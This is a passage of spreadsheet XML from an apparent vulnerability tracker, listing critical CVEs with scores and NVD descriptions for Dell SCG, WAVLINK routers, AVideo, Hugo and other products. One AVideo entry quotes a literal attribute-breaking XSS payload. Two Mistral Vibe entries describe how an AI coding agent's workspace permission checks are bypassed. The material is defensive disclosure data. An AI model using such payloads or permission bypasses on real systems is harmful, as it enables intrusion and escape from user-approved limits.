        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80238</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. This vulnerability is considered critical because a low-privileged operator with SSH access to the SCG host can gain root-level access to the host without requiring a password by leveraging the exposed Docker socket. Additionally, an attacker who compromises a service running within the orchestrator container can access the same socket and escape the container boundary to obtain host-level control. Dell recommends that customers upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80238</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87984</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file write vulnerability in Mistral Vibe, introduced in version 1.3.4, allows an attacker to create or overwrite files outside the active workspace without user approval. Shell redirection destinations are omitted from permission checks, enabling otherwise allowlisted commands to write to arbitrary paths accessible to the Vibe process.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87984</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89010</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>WAVLINK WN535M1 and WN535M3 routers running firmware prior to M35M1_V250922 contain an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary commands as root by sending crafted filenames to the sync_server daemon on TCP port 13136. The daemon interpolates attacker-controlled filename input containing shell metacharacters into a shell command string via sprintf() and passes it to system() without sanitization, enabling root-level command execution on the device.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89010</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89249</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the YPTWallet plugin where user-supplied CryptoWallet values are base64-encoded but not HTML-escaped before storage in wallet_log.information. Administrators viewing pending withdrawal requests in pendingRequests.php execute the stored markup in their session, allowing attackers to perform administrative actions via same-origin fetch requests.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89249</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89253</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the user 'donationLink' profile field. User::setDonationLink() (objects/user.php) stores the value and save() validates it only with filter_var(..., FILTER_VALIDATE_URL), which accepts strings such as http://evil.example/"onmouseover=alert(document.domain)//, while getDonationLink() applies only strip_tags() and does not encode double quotes. plugin/CustomizeUser/actionButton.php echoes the value unencoded into an &lt;a href="..."&gt; attribute, and that button is included from view/modeYoutubeBottom.php on the watch page when the CustomizeUser option allowDonationLink is enabled. An authenticated user who updates their own profile via objects/userUpdate.json.php can therefore break out of the href attribute and inject an event handler that executes JavaScript in the browser of any visitor—including an administrator—who views the attacker's videos and interacts with (for example, hovers over) the donation button. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89253</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89254</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the CustomizeUser plugin where the field_name parameter is stored raw without sanitization. Administrators can inject malicious scripts via the add.json.php endpoint that execute when viewing extra info pages or profile forms that render the typeToHTML function.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89254</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89255</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to HTML-encode PGP public keys echoed into a textarea element. An authenticated attacker can inject malicious JavaScript by submitting a crafted public key, which executes in an administrator's session when viewing the user's profile tab.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89255</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89256</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the Bookmark plugin where chapter names are not encoded before being concatenated into public watch-page HTML. A video owner can inject malicious scripts via the bookmark name parameter, and every visitor of that video executes the payload in the AVideo origin.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89256</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89258</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. In versions after v0.123.0 and before v0.165.0, symlinks in parent directories were not dropped during direct resource lookups, allowing path confinement to be bypassed. An attacker who can place — or who convinces a site author to place — a symlink inside a mounted directory (for example, in a locally vendored theme under themes/) can cause functions that perform direct lookups, such as resources.Get and os.ReadFile, to follow that symlink and read files outside the intended project boundaries, disclosing their contents in the built site. Themes mounted as Go modules fetched from GitHub have symlinks stripped on download and are not affected, and multi-directory walks (e.g. content/asset walking) are not affected. This issue is an incomplete-fix follow-up to GHSA-c3wq-j5vh-68rc and GHSA-fw87-fv5r-9fpw; it is fixed in v0.165.0.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89258</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89259</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. From v0.161.0, Hugo executes Node tools under Node's permission model, but TailwindCSS — included in the default security.exec.allow list — requires a highly permissive configuration (--allow-addons, --allow-child-process, --allow-worker). As a result, the restrictions intended by the fix for GHSA-x597-9fr4-5857 could still be bypassed, allowing a Node tool invoked during a build to read and write files outside the project's working directory. Affected versions are those after v0.43; the issue was fixed in v0.165.0 by removing tailwindcss from the default security.exec.allow list. Users who do not use TailwindCSS, or who only build trusted sites, are not affected. As a workaround, users can define a restrictive security.exec.allow list in hugo.toml.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89259</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89448</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Force requesting ACS when tboot is enabled
Currently the conditions of requesting ACS in detect_intel_iommu()
don't include tboot, leading to a possible misconfiguration with ACS
disabled (e.g. due to user opts) while iommu is later forced on by
tboot_force_iommu().
Fix it by checking tboot in detect_intel_iommu().</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89448</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3869</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-303 : Incorrect Implementation of Authentication Algorithm vulnerability exists that could cause loss of confidentiality, integrity and availability of the PLC provided an application project with a lower application level is running on the PLC.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3869</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47839</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>security@vmware.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allows users authenticating through a federated OIDC provider to obtain the uaa.admin scope despite operators restricting that provider through externalGroupsWhitelist configuration. The issue occurs specifically when an OIDC identity provider uses groupMappingMode: AS_SCOPES with a wildcard externalGroupsWhitelist entry.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47839</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54047</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-349, CWE-602</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>Laci Synchroni is a decentralized mod and appearance sync server and plugin for Dalamud. Versions of the backend prior to 1.2.3 have an improper authentication vulnerability in the application's OAuth2 login flow. The application relies on client-side state by trusting the `UID` field inside the `Authentications` object of a user's local `config.json` file. By manually editing this local file on their PC prior to logging in, a user can supply an arbitrary UID. Because the server fails to validate that the authenticated OAuth2 identity matches the requested UID, an attacker can fully impersonate any target user and perform actions on their behalf. This issue has been resolved in version 1.2.3. The patch modifies `AuthorizeOauthAsync` inside the `SecretKeyAuthenticatorService` to strictly bind the lookup of the requested User ID (`requestedUid`) to the record of the successfully authenticated identity (`primaryUid`). The server will no longer load or return session tokens for a requested UID unless it matches the verified, authenticated database record. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54047</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87983</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file read vulnerability in Mistral Vibe, introduced in version 2.6.0, allows an attacker to bypass workspace restrictions using quoted absolute paths in allowlisted shell commands. Improper handling of quotation marks during path validation enables files outside the active workspace to be read without user approval.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87983</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89212</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
